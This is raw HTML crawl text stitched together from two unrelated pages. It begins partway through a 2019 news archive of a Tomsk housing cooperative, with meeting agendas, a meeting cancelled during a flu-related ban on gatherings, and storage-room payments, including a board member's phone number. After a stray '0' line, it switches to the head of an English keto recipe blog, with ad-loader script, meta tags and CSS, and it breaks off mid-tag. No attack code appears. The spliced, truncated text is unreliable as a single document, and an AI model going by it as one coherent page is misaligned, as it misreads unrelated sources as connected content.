http://www.jskdom.ru/wp-content/uploads/2019/03/стройплощадка-10.10-053-1024x769.jpg 1024w" sizes="(max-width: 300px) 100vw, 300px" /></a></p> <p>С уважением,</p> <p>Правление ЖСК</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=1994" rel="bookmark"><time class="entry-date published updated" datetime="2019-03-13T12:55:08+00:00">13.03.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-1984" class="post-1984 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=1984" rel="bookmark">Общее собрание ЖСК 14 марта</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики! Общее собрание ЖСК состоится  в четверг, 14 марта, в конгресс-центре «Рубин». Начало регистрации участников в 16.30., начало заседания в 17.00.</p> <p>Повестка собрания.</p> <p>Выборы рабочих органов Собрания.</p> <ol> <li>О результатах работы комиссии Правления по приему заявлений в ЖСК.</li> </ol> <ul> <li>Прием в ЖСК.</li> <li>Утверждение предварительного распределения кладовых помещений между пайщиками ЖСК.</li> </ul> <ol start="2"> <li>О строительстве домов ЖСК.</li> </ol> <ul> <li>О ходе работ на строительной площадке ЖСК.</li> <li>Утверждение форм листа осмотра помещения и акта приема-передачи квартиры.</li> <li>Уточнение размера паев после получения результатов обмера жилых и нежилых помещений.</li> <li>О коммерческих предложениях поставщиков телекоммуникационных услуг, поступивших в Правление ЖСК.</li> </ul> <ol start="3"> <li>Финансовое положение ЖСК.</li> </ol> <ul> <li>Состояние оплаты всех видов взносов членами ЖСК.</li> <li>Информация о движении средств за период с 1 января по 31 декабря 2018 г.</li> <li>Утверждение сметы расходования членских, вступительных взносов и средств Специального фонда ЖСК на I-II кварталы 2019 г.</li> </ul> <p>Проекты документов, которые планируется рассмотреть на общем собрании, размещены в разделе Документация.</p> <p>С уважением, Правление ЖСК</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=1984" rel="bookmark"><time class="entry-date published updated" datetime="2019-03-07T16:52:14+00:00">07.03.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-1968" class="post-1968 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=1968" rel="bookmark">Оплата и распределение кладовых помещений</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>Сбор средств за кладовые помещения, распределение которых утверждено решением общего собрания ЖСК, стартует 11 февраля 2019. Срок внесения средств &#8212; 14 дней. Квитанции на оплату Вы можете получить у ответственных по организации членов Правления и КРК. Просьба не задерживать оплату!</p> <p>Также сообщаем, что на данный момент имеются следующие нераспределенные кладовые помещения:</p> <p>корпус 1 , 9 этаж, 8,2 кв.м.</p> <p>корпус 1, 10 этаж, 4 кв.м.</p> <p>корпус 2, 10 этаж, 8,2 кв.м.</p> <p>Желающие написать заявление на кладовое помещение могут обратиться в комиссию по приему заявлений (Ирина Германовна Ященко, тел.89138509158).</p> <p>С уважением,</p> <p>Правление ЖСК</p> <p>&nbsp;</p> <p>&nbsp;</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=1968" rel="bookmark"><time class="entry-date published" datetime="2019-02-06T14:30:18+00:00">06.02.2019</time><time class="updated" datetime="2019-02-07T23:06:27+00:00">07.02.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-1941" class="post-1941 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=1941" rel="bookmark">Общее собрание 31.01.2019 отменяется</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики!</p> <p>В соответствии с постановлением главного государственного санитарного врача по Томской области от 21.01.2019 № 01 «О мерах по снижению заболеваемости гриппом и другими острыми респираторными вирусными инфекциями в Томской области» <a href="http://www.jskdom.ru/wp-admin/post.php?post=1943&amp;action=edit">распоряжением</a> и.о. начальника департамента науки и высшего образования на территории муниципального образования «Город Томск» с 21 января 2019 года введён запрет на проведение массовых (более 100 человек) мероприятий. В связи с этим Общее собрание 31 января отменяется. Дата проведения будет определена позднее, после отмены запрета на проведение массовых мероприятий.</p> <p>С уважением,</p> <p>Правление ЖСК</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=1941" rel="bookmark"><time class="entry-date published updated" datetime="2019-01-29T15:02:00+00:00">29.01.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <article id="post-1938" class="post-1938 post type-post status-publish format-standard hentry category-2"> <header class="entry-header"> <h2 class="entry-title"><a href="http://www.jskdom.ru/?p=1938" rel="bookmark">Общее собрание ЖСК 31.01.2019</a></h2> </header><!-- .entry-header --> <div class="entry-content"> <p>Уважаемые пайщики! Общее собрание ЖСК состоится  в четверг, 31 января, в конгресс-центре «Рубин». Начало регистрации участников в 16.30., начало заседания в 17.00.</p> <p>Повестка собрания.</p> <p>Выборы рабочих органов Собрания.</p> <ol> <li>О результатах работы комиссии Правления по приему заявлений в ЖСК.</li> </ol> <ul> <li>1. Прием в ЖСК.</li> <li>2. Утверждение предварительного распределения кладовых помещений между пайщиками ЖСК.</li> </ul> <ol start="2"> <li>О строительстве домов ЖСК.</li> </ol> <ul> <li>1. О ходе работ на строительной площадке ЖСК.</li> <li>2. Утверждение форм листа осмотра помещения и акта приема-передачи квартиры.</li> </ul> <ol start="3"> <li>Финансовое положение ЖСК.</li> </ol> <ul> <li>1. Состояние оплаты всех видов взносов членами ЖСК.</li> <li>2. Информация о движении средств за период с 1 января по 31 декабря 2018 г.</li> <li>3. Утверждение сметы расходов членских, вступительных взносов и средств Специального фонда ЖСК на I-II кварталы 2019 г.</li> </ul> <ol start="4"> <li>Уточнение размера паев после получения результатов обмера жилых и нежилых помещений.</li> </ol> <p>Проекты документов, которые планируется рассмотреть на общем собрании, будут размещены в разделе Документация в понедельник, 28.01.2019.</p> <p>С уважением, Правление ЖСК</p> </div><!-- .entry-content --> <footer class="entry-footer"> <span class="posted-on"><span class="screen-reader-text">Опубликовано </span><a href="http://www.jskdom.ru/?p=1938" rel="bookmark"><time class="entry-date published updated" datetime="2019-01-25T21:25:29+00:00">25.01.2019</time></a></span><span class="byline"><span class="author vcard"><span class="screen-reader-text">Автор </span><a class="url fn n" href="http://www.jskdom.ru/?author=6">Елена Александровна Петрова</a></span></span><span class="cat-links"><span class="screen-reader-text">Рубрики </span><a href="http://www.jskdom.ru/?cat=2" rel="category">Новости</a></span> </footer><!-- .entry-footer --> </article><!-- #post-## --> <nav class="navigation pagination" role="navigation"> <h2 class="screen-reader-text">Навигация по записям</h2> <div class="nav-links"><span class='page-numbers current'><span class="meta-nav screen-reader-text">Страница </span>1</span> <a class='page-numbers' href='http://www.jskdom.ru/?paged=2'><span class="meta-nav screen-reader-text">Страница </span>2</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='http://www.jskdom.ru/?paged=32'><span class="meta-nav screen-reader-text">Страница </span>32</a> <a class="next page-numbers" href="http://www.jskdom.ru/?paged=2">Следующая страница</a></div> </nav> </main><!-- .site-main --> </div><!-- .content-area --> </div><!-- .site-content --> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="site-info"> </div><!-- .site-info --> </footer><!-- .site-footer --> </div><!-- .site --> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.51.0-2014.06.20'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpcf7 = {"loaderUrl":"http:\/\/www.jskdom.ru\/wp-content\/plugins\/contact-form-7\/images\/ajax-loader.gif","recaptchaEmpty":"Please verify that you are not a robot.","sending":"\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430..."}; /* ]]> */ </script> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=4.3.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"http:\/\/www.jskdom.ru\/wp-admin\/admin-ajax.php","text_wait":"\u0412\u0430\u0448 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0437\u0430\u043f\u0440\u043e\u0441 \u0435\u0449\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430 \u043f\u043e\u0434\u043e\u0436\u0434\u0438\u0442\u0435 ...","text_valid":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430 \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e \u0432\u044b\u0431\u0435\u0440\u0438\u0442\u0435 \u043e\u0442\u0432\u0435\u0442.","text_multiple":"\u041c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c\u043e\u0435 \u0447\u0438\u0441\u043b\u043e \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432:","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/plugins/wp-polls/polls-js.js?ver=2.73.8'></script> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/themes/twentyfifteen/js/skip-link-focus-fix.js?ver=20141010'></script> <script type='text/javascript'> /* <![CDATA[ */ var screenReaderText = {"expand":"<span class=\"screen-reader-text\">\u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0435 \u043c\u0435\u043d\u044e<\/span>","collapse":"<span class=\"screen-reader-text\">\u0441\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u0434\u043e\u0447\u0435\u0440\u043d\u0435\u0435 \u043c\u0435\u043d\u044e<\/span>"}; /* ]]> */ </script> <script type='text/javascript' src='http://www.jskdom.ru/wp-content/themes/twentyfifteen/js/functions.js?ver=20150330'></script> <script type='text/javascript' src='http://www.jskdom.ru/wp-includes/js/wp-embed.min.js?ver=4.7.13'></script> </body> </html>
0
<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Home | Living Chirpy</title><link rel="stylesheet" href="https://www.livingchirpy.com/wp-content/cache/min/1/f5512212ccc5fe55f839f7f49fa66092.css" data-minify="1" /> <script>window.adthrive = window.adthrive || {}; window.adthrive.cmd = window.adthrive.cmd || []; window.adthrive.host = 'ads.adthrive.com'; window.adthrive.plugin = 'adthrive-ads-1.0.32'; window.adthrive.threshold = Math.floor(Math.random() * 100 + 1); (function() { var script = document.createElement('script'); script.async = true; script.type = 'text/javascript'; script.src = document.location.protocol + '//ads.adthrive.com/sites/5c54ad11f450534e4940a880/ads.min.js?threshold=' + window.adthrive.threshold; var node = document.getElementsByTagName('script')[0]; node.parentNode.insertBefore(script, node); })();</script> <meta property="og:description" content="The Home Of Healthy Whole Food Recipes! Hello Fellow Foodies! If deliciously healthy food is what you’re after, then look no further. Here at LivingChirpy.com you’ll find a large collection of quick, easy AND healthy Low-Carb, Keto and often Paleo recipes that uses fresh, whole ingredients. Learn More Coming Soon! :) Start A Food Blog How to Cook Like A Pro Latest Diets Explained Latest Recipes More Recipes Latest Roundups More Roundups Main Meals More Main Meals Breakfast More Breakfasts Sides More Sides Facebook Pinterest Instagram Youtube Featured Posts"><meta property="og:title" content="Home"><meta property="fb:app_id" content="529576650555031"><meta property="og:type" content="article"><meta property="og:url" content="https://www.livingchirpy.com/"><meta property="og:site_name" content="Living Chirpy"><meta property="article:published_time" content="2018-12-06T10:35:08+00:00"><meta property="article:modified_time" content="2019-03-07T06:23:53+00:00"><meta property="og:updated_time" content="2019-03-07T06:23:53+00:00"><meta name="twitter:title" content="Home"><meta name="twitter:description" content="The Home Of Healthy Whole Food Recipes! Hello Fellow Foodies! If deliciously healthy food is what you’re after, then look no further. Here at LivingChirpy.com you’ll find a large collection of quick, easy AND healthy Low-Carb, Keto and often Paleo recipes that uses fresh, whole ingredients. Learn More Coming Soon! :) Start A Food Blog How to Cook Like A Pro Latest Diets Explained Latest Recipes More Recipes Latest Roundups More Roundups Main Meals More Main Meals Breakfast More Breakfasts Sides More Sides Facebook Pinterest Instagram Youtube Featured Posts"><meta name="twitter:image" content=""><meta name="twitter:creator" content=""><meta name="twitter:card" content="summary"><style>@font-face{font-family:"sw-icon-font";src:url(https://www.livingchirpy.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0);src:url("https://www.livingchirpy.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url(https://www.livingchirpy.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0) format("woff"),url(https://www.livingchirpy.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0) format("truetype"),url("https://www.livingchirpy.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:400;font-style:normal}</style><link rel="canonical" href="https://www.livingchirpy.com/" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="The Home Of Healthy Whole Food Recipes! Hello Fellow Foodies! If deliciously healthy food is what you’re after, then look no further. Here at LivingChirpy.com you’ll find a large collection of quick, easy AND healthy Low-Carb, Keto and often Paleo recipes that uses fresh, whole ingredients. Learn More Coming Soon! 🙂 Start A Food Blog &hellip; Home Read More &raquo;" /><meta name="twitter:title" content="Home | Living Chirpy" /><meta name="twitter:image" content="https://www.livingchirpy.com/wp-content/uploads/2018/12/Family-Photo.jpg" /> <script type='application/ld+json' class='yoast-schema-graph yoast-schema-graph--main'>{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.livingchirpy.com/#website","url":"https://www.livingchirpy.com/","name":"Living Chirpy","publisher":{"@id":"https://www.livingchirpy.com/#person"},"potentialAction":{"@type":"SearchAction","target":"https://www.livingchirpy.com/?s={search_term_string}","query-input":"required name=search_term_string"}},{"@type":"WebPage","@id":"https://www.livingchirpy.com/#webpage","url":"https://www.livingchirpy.com/","inLanguage":"en-US","name":"Home | Living Chirpy","isPartOf":{"@id":"https://www.livingchirpy.com/#website"},"about":{"@id":"https://www.livingchirpy.com/#person"},"image":{"@type":"ImageObject","@id":"https://www.livingchirpy.com/#primaryimage","url":"https://www.livingchirpy.com/wp-content/uploads/2018/12/Family-Photo.jpg","width":600,"height":492},"primaryImageOfPage":{"@id":"https://www.livingchirpy.com/#primaryimage"},"datePublished":"2018-12-06T14:35:08+00:00","dateModified":"2019-03-07T10:23:53+00:00"}]}</script> <link rel='dns-prefetch' href='//www.google.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//www.google-analytics.com' /><link rel="alternate" type="application/rss+xml" title="Living Chirpy &raquo; Feed" href="https://www.livingchirpy.com/feed/" /><link rel="alternate" type="application/rss+xml" title="Living Chirpy &raquo; Comments Feed" href="https://www.livingchirpy.com/comments/feed/" /><style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-0.1em!important;background:none!important;padding:0!important}</style><style id='astra-theme-css-inline-css' type='text/css'>html{font-size:93.75%}a,.page-title{color:#e35503}a:hover,a:focus{color:#3a3a3a}body,button,input,select,textarea{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-weight:inherit;font-size:15px;font-size:1rem}blockquote{color:#000}.site-title{font-size:35px;font-size:2.3333333333333rem}header .site-logo-img .custom-logo-link img{max-width:152px}.astra-logo-svg{width:152px}.ast-archive-description .ast-archive-title{font-size:40px;font-size:2.6666666666667rem}.site-header .site-description{font-size:15px;font-size:1rem}.entry-title{font-size:30px;font-size:2rem}.comment-reply-title{font-size:24px;font-size:1.6rem}.ast-comment-list #cancel-comment-reply-link{font-size:15px;font-size:1rem}h1,.entry-content h1{font-size:48px;font-size:3.2rem}h2,.entry-content h2{font-size:42px;font-size:2.8rem}h3,.entry-content h3{font-size:30px;font-size:2rem}h4,.entry-content h4{font-size:20px;font-size:1.3333333333333rem}h5,.entry-content h5{font-size:18px;font-size:1.2rem}h6,.entry-content h6{font-size:15px;font-size:1rem}.ast-single-post .entry-title,.page-title{font-size:30px;font-size:2rem}#secondary,#secondary button,#secondary input,#secondary select,#secondary textarea{font-size:15px;font-size:1rem}::selection{background-color:#93b823;color:#000}body,h1,.entry-title a,.entry-content h1,h2,.entry-content h2,h3,.entry-content h3,h4,.entry-content h4,h5,.entry-content h5,h6,.entry-content h6{color:#3a3a3a}.tagcloud a:hover,.tagcloud a:focus,.tagcloud a.current-item{color:#fff;border-color:#e35503;background-color:#e35503}.main-header-menu a,.ast-header-custom-item a{color:#3a3a3a}.main-header-menu li:hover>a,.main-header-menu li:hover>.ast-menu-toggle,.main-header-menu .ast-masthead-custom-menu-items a:hover,.main-header-menu li.focus>a,.main-header-menu li.focus>.ast-menu-toggle,.main-header-menu .current-menu-item>a,.main-header-menu .current-menu-ancestor>a,.main-header-menu .current_page_item>a,.main-header-menu .current-menu-item>.ast-menu-toggle,.main-header-menu .current-menu-ancestor>.ast-menu-toggle,.main-header-menu .current_page_item>.ast-menu-toggle{color:#e35503}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,textarea:focus{border-color:#e35503}input[type="radio"]:checked,input[type=reset],input[type="checkbox"]:checked,input[type="checkbox"]:hover:checked,input[type="checkbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:#e35503;background-color:#e35503;box-shadow:none}.site-footer a:hover+.post-count,.site-footer a:focus+.post-count{background:#e35503;border-color:#e35503}.footer-adv .footer-adv-overlay{border-top-style:solid;border-top-color:#7a7a7a}.ast-comment-meta{line-height:1.666666667;font-size:12px;font-size:.8rem}.single .nav-links .nav-previous,.single .nav-links .nav-next,.single .ast-author-details .author-title,.ast-comment-meta{color:#e35503}.menu-toggle,button,.ast-button,.button,input#submit,input[type="button"],input[type="submit"],input[type="reset"]{border-radius:2px;padding:10px 40px;color:#000;border-color:#93b823;background-color:#93b823}button:focus,.menu-toggle:hover,button:hover,.ast-button:hover,.button:hover,input[type=reset]:hover,input[type=reset]:focus,input#submit:hover,input#submit:focus,input[type="button"]:hover,input[type="button"]:focus,input[type="submit"]:hover,input[type="submit"]:focus{color:#fff;border-color:#3a3a3a;background-color:#3a3a3a}.entry-meta,.entry-meta *{line-height:1.45;color:#e35503}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *{color:#3a3a3a}.ast-404-layout-1 .ast-404-text{font-size:200px;font-size:13.333333333333rem}.widget-title{font-size:21px;font-size:1.4rem;color:#3a3a3a}#cat option,.secondary .calendar_wrap thead a,.secondary .calendar_wrap thead a:visited{color:#e35503}.secondary .calendar_wrap #today,.ast-progress-val span{background:#e35503}.secondary a:hover+.post-count,.secondary a:focus+.post-count{background:#e35503;border-color:#e35503}.calendar_wrap #today>a{color:#fff}.ast-pagination a,.page-links .page-link,.single .post-navigation a{color:#e35503}.ast-pagination a:hover,.ast-pagination a:focus,.ast-pagination>span:hover:not(.dots),.ast-pagination>span.current,.page-links>.page-link,.page-links .page-link:hover,.post-navigation a:hover{color:#3a3a3a}.ast-header-break-point .ast-mobile-menu-buttons-minimal.menu-toggle{background:transparent;color:#93b823}.ast-header-break-point .ast-mobile-menu-buttons-outline.menu-toggle{background:transparent;border:1px solid #93b823;color:#93b823}.ast-header-break-point .ast-mobile-menu-buttons-fill.menu-toggle{background:#93b823}@media (min-width:545px){.ast-page-builder-template .comments-area,.single.ast-page-builder-template .entry-header,.single.ast-page-builder-template .post-navigation{max-width:1240px;margin-left:auto;margin-right:auto}}body,.ast-separate-container{background-color:#fff}@media (max-width:768px){.ast-archive-description .ast-archive-title{font-size:40px}.entry-title{font-size:30px}h1,.entry-content h1{font-size:30px}h2,.entry-content h2{font-size:25px}h3,.entry-content h3{font-size:20px}.ast-single-post .entry-title,.page-title{font-size:30px}}@media (max-width:544px){.ast-archive-description .ast-archive-title{font-size:40px}.entry-title{font-size:30px}h1,.entry-content h1{font-size:30px}h2,.entry-content h2{font-size:25px}h3,.entry-content h3{font-size:20px}.ast-single-post .entry-title,.page-title{font-size:30px}}@media (max-width:768px){html{font-size:85.5%}}@media (max-width:544px){html{font-size:85.5%}}@media (min-width:769px){.ast-container{max-width:1240px}}@font-face{font-family:"Astra";src:url(https://www.livingchirpy.com/wp-content/themes/astra/assets/fonts/astra.woff) format("woff"),url(https://www.livingchirpy.com/wp-content/themes/astra/assets/fonts/astra.ttf) format("truetype"),url(https://www.livingchirpy.com/wp-content/themes/astra/assets/fonts/astra.svg#astra) format("svg");font-weight:400;font-style:normal;font-display:fallback}@media (max-width:921px){.main-header-bar .main-header-bar-navigation{display:none}}.ast-desktop .main-header-menu.submenu-with-border .sub-menu,.ast-desktop .main-header-menu.submenu-with-border .children,.ast-desktop .main-header-menu.submenu-with-border .astra-full-megamenu-wrapper{border-color:#93b823}.ast-desktop .main-header-menu.submenu-with-border .sub-menu,.ast-desktop .main-header-menu.submenu-with-border .children{border-top-width:2px;border-right-width:0;border-left-width:0;border-bottom-width:0;border-style:solid}.ast-desktop .main-header-menu.submenu-with-border .sub-menu .sub-menu,.ast-desktop .main-header-menu.submenu-with-border .children .children{top:-2px}.ast-desktop .main-header-menu.submenu-with-border .sub-menu a,.ast-desktop .main-header-menu.submenu-with-border .children a{border-bottom-width:0;border-style:solid;border-color:#eaeaea}@media (min-width:769px){.main-header-menu .sub-menu li.ast-left-align-sub-menu:hover>ul,.main-header-menu .sub-menu li.ast-left-align-sub-menu.focus>ul{margin-left:0}}.ast-small-footer{border-top-style:solid;border-top-width:1px;border-top-color:#7a7a7a}.ast-small-footer-wrap{text-align:center}@media (max-width:920px){.ast-404-layout-1 .ast-404-text{font-size:100px;font-size:6.6666666666667rem}}.ast-header-break-point .site-header{border-bottom-width:1px}@media (min-width:769px){.main-header-bar{border-bottom-width:1px}}@media (min-width:769px){#primary{width:70%}#secondary{width:30%}}.main-header-menu .menu-item,.main-header-bar .ast-masthead-custom-menu-items{-js-display:flex;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-moz-box-orient:vertical;-moz-box-direction:normal;-ms-flex-direction:column;flex-direction:column}.main-header-menu>.menu-item>a{height:100%;-webkit-box-align:center;-webkit-align-items:center;-moz-box-align:center;-ms-flex-align:center;align-items:center;-js-display:flex;display:flex}.ast-primary-menu-disabled .main-header-bar .ast-masthead-custom-menu-items{flex:unset}#masthead .ast-container,.ast-header-breadcrumb .ast-container{max-width:100%;padding-left:35px;padding-right:35px}@media (max-width:921px){#masthead .ast-container,.ast-header-breadcrumb .ast-container{padding-left:20px;padding-right:20px}}#masthead .ast-container,.ast-header-breadcrumb .ast-container{max-width:100%;padding-left:35px;padding-right:35px}@media (max-width:921px){#masthead .ast-container,.ast-header-breadcrumb .ast-container{padding-left:20px;padding-right:20px}}@media (min-width:769px){.ast-theme-transparent-header #masthead{position:absolute;left:0;right:0}.ast-theme-transparent-header .main-header-bar,.ast-theme-transparent-header.ast-header-break-point .main-header-bar{background:none}body.elementor-editor-active.ast-theme-transparent-header #masthead,.fl-builder-edit .ast-theme-transparent-header #masthead,body.vc_editor.ast-theme-transparent-header #masthead{z-index:0}.ast-header-break-point.ast-replace-site-logo-transparent.ast-theme-transparent-header .custom-mobile-logo-link{display:none}.ast-header-break-point.ast-replace-site-logo-transparent.ast-theme-transparent-header .transparent-custom-logo{display:inline-block}.ast-theme-transparent-header .ast-above-header{background-image:none;background-color:transparent}.ast-theme-transparent-header .ast-below-header{background-image:none;background-color:transparent}}@media (max-width:768px){.ast-theme-transparent-header #masthead{position:absolute;left:0;right:0}.ast-theme-transparent-header .main-header-bar,.ast-theme-transparent-header.ast-header-break-point .main-header-bar{background:none}body.elementor-editor-active.ast-theme-transparent-header #masthead,.fl-builder-edit .ast-theme-transparent-header #masthead,body.vc_editor.ast-theme-transparent-header #masthead{z-index:0}.ast-header-break-point.ast-replace-site-logo-transparent.ast-theme-transparent-header .custom-mobile-logo-link{display:none}.ast-header-break-point.ast-replace-site-logo-transparent.ast-theme-transparent-header .transparent-custom-logo{display:inline-block}.ast-theme-transparent-header .ast-above-header{background-image:none;background-color:transparent}.ast-theme-transparent-header .ast-below-header{background-image:none;background-color:transparent}}.ast-theme-transparent-header .main-header-bar,.ast-theme-transparent-header .site-header{border-bottom-width:0}.ast-breadcrumbs .trail-browse,.ast-breadcrumbs .trail-items,.ast-breadcrumbs .trail-items li{display:inline-block;margin:0;padding:0;border:none;background:inherit;text-indent:0}.ast-breadcrumbs .trail-browse{font-size:inherit;font-style:inherit;font-weight:inherit;color:inherit}.ast-breadcrumbs .trail-items{list-style:none}.trail-items li::after{padding:0 .3em;content:"»"}.trail-items li:last-of-type::after{display:none}</style><style id='rocket-lazyload-inline-css' type='text/css'>.rll-youtube-player{position:relative;padding-bottom:56.23%;height:0;overflow:hidden;max-width:100%}.rll-youtube-player iframe{position:absolute;top:0;left:0;width:100%;height:100%;z-index:100;background:0 0}.rll-youtube-player img{bottom:0;display:block;left:0;margin:auto;max-width:100%;width:100%;position:absolute;right:0;top:0;border:none;height:auto;cursor:pointer;-webkit-transition:.4s all;-moz-transition:.4s all;transition:.4s all}.rll-youtube-player img:hover{-webkit-filter:brightness(75%)}.rll-youtube-player .play{height:72px;width:72px;left:50%;top:50%;margin-left:-36px;margin-top:-36px;position:absolute;background:url(https://www.livingchirpy.com/wp-content/plugins/wp-rocket/assets/img/youtube.png) no-repeat;cursor:pointer}</style><link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CBarlow+Condensed%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CCourgette%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CFjalla+One%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7COpen+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CArchivo+Narrow%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CArchivo%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&#038;ver=deca7c9fed7f69df37f613a82edf7bbe' type='text/css' media='all' /> <!--[if IE]> <script type='text/javascript' src='https://www.livingchirpy.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=1.8.3'></script> <script type='text/javascript'>flexibility(document.documentElement);</script> <![endif]--><link rel='https://api.w.org/' href='https://www.livingchirpy.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.livingchirpy.com/xmlrpc.php?rsd" /><link 